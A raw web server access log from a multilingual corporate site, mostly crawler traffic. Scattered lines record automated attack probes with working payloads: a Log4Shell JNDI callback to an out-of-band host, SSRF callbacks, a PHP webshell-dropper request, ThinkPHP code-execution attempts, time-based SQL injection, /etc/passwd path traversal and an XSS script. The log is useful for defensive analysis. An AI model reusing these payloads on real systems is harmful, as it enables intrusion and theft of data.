34.56.53.225 - - [24/Aug/2026:22:41:17 +0500] "GET /uz/component/search/?Itemid=17245&catid=2&format=opensearch&id=9728 HTTP/1.1" 200 718 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.244.66.231 - - [24/Aug/2026:22:41:27 +0500] "GET /uz/?template=yoo_master2&start=18 HTTP/1.1" 200 60815 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
34.10.180.98 - - [24/Aug/2026:22:41:28 +0500] "GET /uz/?__kds_flag=post&start=36 HTTP/1.1" 200 61834 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:41:38 +0500] "GET /uz/?start=30&wptouch_switch=desktop HTTP/1.1" 200 60746 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:22:41:40 +0500] "GET /uz/component/search/?Itemid=17016&catid=6193&format=opensearch&id=9886 HTTP/1.1" 200 736 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:22:42:42 +0500] "GET /?author=1&start=42 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.244.66.231 - - [24/Aug/2026:22:43:06 +0500] "GET /uz/officially-uzb/ustav-uzb/6193-fixed-assets/9856-reestr-xarid-11-2023-xlsx HTTP/1.1" 200 32252 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.231 - - [24/Aug/2026:22:43:36 +0500] "GET /uz/stockholders-uzb/invest-uzb/2-uncategorised/9727-socially-information-uz HTTP/1.1" 200 33155 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
34.57.162.91 - - [24/Aug/2026:22:43:43 +0500] "GET /component/search/?Itemid=16998&format=opensearch&template=oloy HTTP/1.1" 200 725 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
47.128.116.82 - - [24/Aug/2026:22:43:50 +0500] "GET /en/about-org-eng/unitar-eng?template=oloy HTTP/1.1" 200 33594 "-" "Mozilla/5.0 (compatible; Bytespider; https://bytedance.sg.larkoffice.com/docx/K5bxdypulop3IIxrJb0lOjLVgFe) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:45:17 +0500] "GET /?rest_route=/batch/v1&start=6 HTTP/1.1" 200 62523 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.244.66.231 - - [24/Aug/2026:22:45:25 +0500] "GET /?p=1165&start=18 HTTP/1.1" 200 63795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.231 - - [24/Aug/2026:22:45:51 +0500] "GET /uz/?tp=1&start=66 HTTP/1.1" 200 62395 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
34.10.180.98 - - [24/Aug/2026:22:45:53 +0500] "GET /uz/?3x=3x&start=18 HTTP/1.1" 200 61032 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:22:45:58 +0500] "GET /en/officially-uzb/arhiv-uzb?format=feed&template=accessibility&type=rss HTTP/1.1" 200 13993 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.244.66.231 - - [24/Aug/2026:22:46:15 +0500] "GET /uz/?p=269&start=18 HTTP/1.1" 200 60947 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
185.191.171.3 - - [24/Aug/2026:22:47:34 +0500] "GET /uz/officially-uzb/vacancies-uzb/6193-fixed-assets/9860-reestr-xarid-12-2023-xlsx HTTP/1.1" 200 32422 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
35.254.159.230 - - [24/Aug/2026:22:48:02 +0500] "GET /component/search/?Itemid=16995&format=opensearch&id=2 HTTP/1.1" 200 716 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:48:57 +0500] "GET /en/stockholders-eng/affiliates-eng?format=feed&template=accessibility&type=rss HTTP/1.1" 200 6293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:22:49:03 +0500] "GET /en/about-org-eng/management-eng?template=oloy HTTP/1.1" 200 35244 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.57.162.91 - - [24/Aug/2026:22:49:20 +0500] "GET /uz/?redirect=https://interact.sh/&start=6 HTTP/1.1" 200 61180 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:22:49:41 +0500] "GET /uz/about-org-uzb/news-uzb/6193-fixed-assets?start=6 HTTP/1.1" 200 37052 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.208 - - [24/Aug/2026:22:50:49 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.208 - - [24/Aug/2026:22:50:56 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [24/Aug/2026:22:50:50 +0500] "GET /?start=24&x=%7Bsource%7DTRIPROBE%7B%2Fsource%7D HTTP/1.1" 200 63084 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.200 - - [24/Aug/2026:22:50:56 +0500] "GET /uz/officially-uzb/vacancies-uzb/6193-fixed-assets/9886-reestr-xarid-6-2024-xlsx HTTP/1.1" 200 32163 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
192.155.93.45 - - [24/Aug/2026:22:51:27 +0500] "HEAD /old/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6534.42 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:51:27 +0500] "GET /uz/?start=6&wpapp_shortcode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&wpappninja_simul4=1 HTTP/1.1" 200 61726 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:22:51:34 +0500] "GET /?format=feed&sl=../../../../../../../etc/passwd%EF%BF%BD&type=rss HTTP/1.1" 200 7521 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
192.155.93.45 - - [24/Aug/2026:22:51:33 +0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36 Brave/1.63.120"
192.155.93.45 - - [24/Aug/2026:22:51:40 +0500] "HEAD /wp/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36 Brave/1.63.120"
192.155.93.45 - - [24/Aug/2026:22:51:44 +0500] "HEAD /new/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.70 Safari/537.36 Vivaldi/6.7.3200.25"
192.155.93.45 - - [24/Aug/2026:22:51:50 +0500] "HEAD /blog/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.141 Safari/537.36"
192.155.93.45 - - [24/Aug/2026:22:51:56 +0500] "HEAD /wordpress/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
192.155.93.45 - - [24/Aug/2026:22:52:02 +0500] "HEAD /backup/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 13; Pixel 7a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.82 Mobile Safari/537.36"
34.42.229.145 - - [24/Aug/2026:22:52:34 +0500] "GET /?start=6&wordpress_x_core=check HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
136.119.35.120 - - [24/Aug/2026:22:53:34 +0500] "GET /?start=66&x=$%7Bjndi:ldap://$%7B:-744%7D$%7B:-364%7D.$%7BhostName%7D.uri.d5393qd2ent3c0b7hdc0u3ktdnw4155kc.oast.fun/a%7D HTTP/1.1" 200 64297 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:22:54:14 +0500] "GET /uz/component/search/?Itemid=17035&catid=2&format=opensearch&id=9306 HTTP/1.1" 200 733 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.9 - - [24/Aug/2026:22:54:56 +0500] "GET /?function=call_user_func_array&s=%2Findex%2F%20hink%3Fpp%2Finvokefunction&vars%5B0%5D=md5&vars%5B1%5D%5B0%5D=hellothinkphp21 HTTP/1.1" 200 63559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.202 - - [24/Aug/2026:22:55:01 +0500] "GET /uz/stockholders-uzb/polls-uzb/2-uncategorised/9730-ensuring-openness-uz?layout=edit HTTP/1.1" 200 34209 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [24/Aug/2026:22:55:56 +0500] "GET /?cats=1%2Asleep%285%29&s=37hvjGXHPCbAIjZcNaPR6DoKAsQ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.42.229.145 - - [24/Aug/2026:22:55:51 +0500] "GET /uz/officially-uzb/presentations-uz/2-uncategorised?format=feed&type=rss HTTP/1.1" 200 18929 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:22:56:58 +0500] "GET /uz/about-org-uzb/news-uzb/6193-fixed-assets/9750-dog-11-2022-xlsx HTTP/1.1" 200 31730 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.17 - - [24/Aug/2026:22:57:18 +0500] "GET /en/stockholders-eng/affiliates-eng/9564-affil-04-11-2020-en HTTP/1.1" 200 29851 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.56.53.225 - - [24/Aug/2026:22:59:08 +0500] "GET /uz/?a=fetch&content=%3C?php+file_put_contents(%222ILXdvLui6QGNGJFaxBSOEp3bhZ.php%22,%22%3C?php+echo+phpinfo()&start=30 HTTP/1.1" 200 61356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:23:00:16 +0500] "GET /uz/?q=user/login&start=72 HTTP/1.1" 200 63447 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:23:01:00 +0500] "GET /uz/?format=feed&rest_route=/wp/v2/users/&type=atom HTTP/1.1" 200 12718 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.14 - - [24/Aug/2026:23:01:07 +0500] "GET /uz/about-org-uzb/objects-uzb/2-uncategorised/9727-socially-information-uz HTTP/1.1" 200 33084 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.171.68.95 - - [24/Aug/2026:23:01:37 +0500] "GET /uz/stockholders-uzb/polls-uzb?start=10&template=oloy HTTP/1.1" 200 43908 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
161.153.11.248 - - [24/Aug/2026:23:01:39 +0500] "GET /stockholders-rus/invest-rus HTTP/1.1" 200 15418 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
161.153.11.248 - - [24/Aug/2026:23:02:22 +0500] "GET /stockholders-rus/invest-rus HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
157.55.39.12 - - [24/Aug/2026:23:02:37 +0500] "GET /?controller=CommentGrade&fc=module&id_products[0]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(8)))xoOt)&start=66 HTTP/1.1" 200 64293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
185.191.171.8 - - [24/Aug/2026:23:03:00 +0500] "GET /uz/about-org-uzb/mediateka-uzb/6193-fixed-assets HTTP/1.1" 200 36414 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.56.53.225 - - [24/Aug/2026:23:03:24 +0500] "GET /?start=36&x=%7Bsource%7DTRIPROBE%7B/source%7D HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.16 - - [24/Aug/2026:23:03:27 +0500] "GET /stockholders-rus/affil-rus/9819-affirir-27-06-2023 HTTP/1.1" 200 32757 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.61.96.6 - - [24/Aug/2026:23:03:53 +0500] "GET /en/officially-eng/old-acts-eng?format=feed&template=oloy&type=atom HTTP/1.1" 200 3072 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:23:03:57 +0500] "GET /?cats=1*sleep(5)&start=48 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.202 - - [24/Aug/2026:23:04:50 +0500] "GET /uz/?a=1&start=60 HTTP/1.1" 200 62045 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.209 - - [24/Aug/2026:23:05:25 +0500] "GET /uz/stockholders-uzb/audit-uzb/6193-fixed-assets/9860-reestr-xarid-12-2023-xlsx HTTP/1.1" 200 32419 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.61.96.6 - - [24/Aug/2026:23:05:42 +0500] "GET /en/stockholders-eng/audit-eng/9529-audit-2017 HTTP/1.1" 200 29721 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:23:06:53 +0500] "GET /en/officially-eng/old-acts-eng?format=feed&template=oloy&type=rss HTTP/1.1" 200 2346 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:23:07:13 +0500] "GET /uz/?function=call_user_func_array&s=/Index/+hink&start=42 HTTP/1.1" 200 61161 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.205 - - [24/Aug/2026:23:07:14 +0500] "GET /uz/?start=18&wptouch_switch=desktop HTTP/1.1" 200 60815 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:23:08:08 +0500] "GET /?start=48&template=accessibility' HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.198 - - [24/Aug/2026:23:08:26 +0500] "GET /uz/officially-uzb/tender-uzb/6193-fixed-assets/9903-reestr-xarid-12-2024 HTTP/1.1" 200 32330 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:23:08:42 +0500] "GET /uz/?destination=node&start=18 HTTP/1.1" 200 60797 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.18 - - [24/Aug/2026:23:08:52 +0500] "GET /en/stockholders-eng/dividend-eng/9688-dividends-2021-en HTTP/1.1" 200 29239 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.123.149.87 - - [24/Aug/2026:23:09:00 +0500] "GET /uz/stockholders-uzb/fin-reports/6193-fixed-assets?format=feed&type=rss HTTP/1.1" 200 8294 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.210 - - [24/Aug/2026:23:09:25 +0500] "GET /uz/about-org-uzb/sitemap-uzb?template=oloy HTTP/1.1" 200 37411 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.210 - - [24/Aug/2026:23:09:34 +0500] "GET /stockholders-rus/comissions-rus HTTP/1.1" 200 41860 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:23:09:41 +0500] "GET /en/?3x=3x&start=18 HTTP/1.1" 200 40450 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.205 - - [24/Aug/2026:23:10:00 +0500] "GET /uz/component/contact/contact/6137-support-department/2794-sample-contact-4?Itemid=17010 HTTP/1.1" 200 59476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.211 - - [24/Aug/2026:23:10:02 +0500] "GET /uz/?start=30&wptouch_switch=desktop HTTP/1.1" 200 61053 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
3.235.215.92 - - [24/Aug/2026:23:10:59 +0500] "GET /uz/?author=1&format=feed&type=atom HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.204.12.115 - - [24/Aug/2026:23:11:03 +0500] "GET /uz/?a=fetch&content=%3C?php%20file_put_contents(%222ILXdvLui6QGNGJFaxBSOEp3bhZ.php%22,%22%3C?php%20echo%20phpinfo()&start=36 HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.197.28.78 - - [24/Aug/2026:23:11:07 +0500] "GET /uz/?a=fetch&content=%3C?php%20file_put_contents(%222ILXdvLui6QGNGJFaxBSOEp3bhZ.php%22,%22%3C?php%20echo%20phpinfo()&start=24 HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.204.89.12 - - [24/Aug/2026:23:11:12 +0500] "GET /uz/?start=72&wptouch_switch=desktop HTTP/1.1" 200 63470 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.3.102.51 - - [24/Aug/2026:23:11:15 +0500] "GET /uz/?doact=yyy18&start=18 HTTP/1.1" 200 60944 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.94.156.104 - - [24/Aug/2026:23:11:23 +0500] "GET /?function=call_user_func_array&s=/index/%20hink?pp/invokefunction&start=72&vars[0]=md5&vars[1][0]=hellothinkphp21 HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.56.53.225 - - [24/Aug/2026:23:11:27 +0500] "GET /uz/officially-uzb/purchasing-commission-documentation-uzb/2-uncategorised?start=10 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
44.223.193.255 - - [24/Aug/2026:23:11:28 +0500] "GET /docs/facts/2022/sush_fakt-08-24.06.2022-full-rk.doc HTTP/1.1" 200 199168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.235.215.92 - - [24/Aug/2026:23:11:19 +0500] "GET /uz/?function=call_user_func_array&s=/Index/%20hink&start=24 HTTP/1.1" 200 62542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
35.168.238.50 - - [24/Aug/2026:23:11:35 +0500] "GET /uz/?qtproxycall=http://ce4utud5ele8pmo00010toc38eigbk5wg.oast.pro&start=42 HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.54.15.103 - - [24/Aug/2026:23:11:31 +0500] "GET /uz/?amp;template=accessibility&start=72 HTTP/1.1" 200 63486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.200.142.199 - - [24/Aug/2026:23:11:54 +0500] "GET /uz/?sl=../../../../../../../etc/passwd?start%3D66&start=24 HTTP/1.1" 200 62555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
85.208.96.210 - - [24/Aug/2026:23:12:43 +0500] "GET /?start=18&vars%5B0%5D=md5&vars%5B1%5D%5B0%5D=HelloThinkPHP21 HTTP/1.1" 200 64005 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.10.180.98 - - [24/Aug/2026:23:12:47 +0500] "GET /uz/?controller=CommentGrade&fc=module&id_products%5B0%5D=1+AND+(SELECT+3875+FROM+(SELECT(SLEEP(8)))xoOt)&module=productcomments&start=48 HTTP/1.1" 200 65169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
52.204.89.12 - - [24/Aug/2026:23:13:58 +0500] "GET /?rest_route=/&start=6 HTTP/1.1" 200 62256 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
85.208.96.199 - - [24/Aug/2026:23:13:59 +0500] "GET /?a=fetch&content=%3C%3Fphp%20file_put_contents%28%222ILXdvLui6QGNGJFaxBSOEp3bhZ.php%22%2C%22%3C%3Fphp%20echo%20phpinfo%28%29%3B%22%29%3B&start=66 HTTP/1.1" 200 65202 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
129.153.114.87 - - [24/Aug/2026:23:15:38 +0500] "GET /contacts-rus/2-uncategorised/9707-socially-information-ru HTTP/1.1" 200 38267 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:23:15:52 +0500] "GET /stockholders-rus/affil-rus/9556-affil-26-06-2020-ru HTTP/1.1" 200 32541 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:23:15:59 +0500] "GET /uz/?format=feed&rest_route=/batch/v1&type=atom HTTP/1.1" 200 12714 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.61.96.6 - - [24/Aug/2026:23:16:30 +0500] "GET /uz/?mobile_co=1&start=42 HTTP/1.1" 200 61038 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
23.21.225.190 - - [24/Aug/2026:23:16:31 +0500] "GET /uz/?__kds_flag=post&start=30 HTTP/1.1" 200 60919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.10.180.98 - - [24/Aug/2026:23:16:39 +0500] "GET /uz/officially-uzb/old-acts-uzb/6193-fixed-assets/9772-dog-xarid-01-2023-xlsx HTTP/1.1" 200 32425 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [24/Aug/2026:23:16:59 +0500] "GET /en/?format=feed&rest_route=/wp/v2/users&type=atom HTTP/1.1" 200 10143 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.123.149.87 - - [24/Aug/2026:23:17:33 +0500] "GET /uz/?start=54 HTTP/1.1" 200 63881 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
